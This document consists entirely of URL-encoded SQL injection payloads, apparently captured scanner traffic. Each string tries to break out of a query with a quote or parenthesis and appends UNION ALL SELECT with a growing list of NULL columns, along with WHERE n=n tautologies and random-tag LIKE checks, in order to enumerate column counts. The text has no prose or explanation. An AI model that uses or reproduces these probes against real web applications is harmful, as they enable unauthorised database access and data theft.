1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22aVZc%22%20LIKE%20%22aVZc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22MqXq%22%20LIKE%20%22MqXq 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22DdRz%22%20LIKE%20%22DdRz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22utaw%22%20LIKE%20%22utaw 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22kzsV%22%20LIKE%20%22kzsV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rvvt%22%20LIKE%20%22rvvt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22QTBL%22%20LIKE%20%22QTBL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22tTHU%22%20LIKE%20%22tTHU 1%29%20WHERE%205818%3D5818%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%209998%3D9998%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207736%3D7736%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205813%3D5813%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%204549%3D4549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208186%3D8186%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%209915%3D9915%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%202080%3D2080%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205883%3D5883%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%203875%3D3875%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208275%3D8275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204215%3D4215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201712%3D1712%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204550%3D4550%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206596%3D6596%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206165%3D6165%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206069%3D6069%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203556%3D3556%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203003%3D3003%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203589%3D3589%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207354%3D7354%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207078%3D7078%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206342%3D6342%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203150%3D3150%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%204176%3D4176%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%204621%3D4621%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207235%3D7235%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201680%3D1680%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%204309%3D4309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 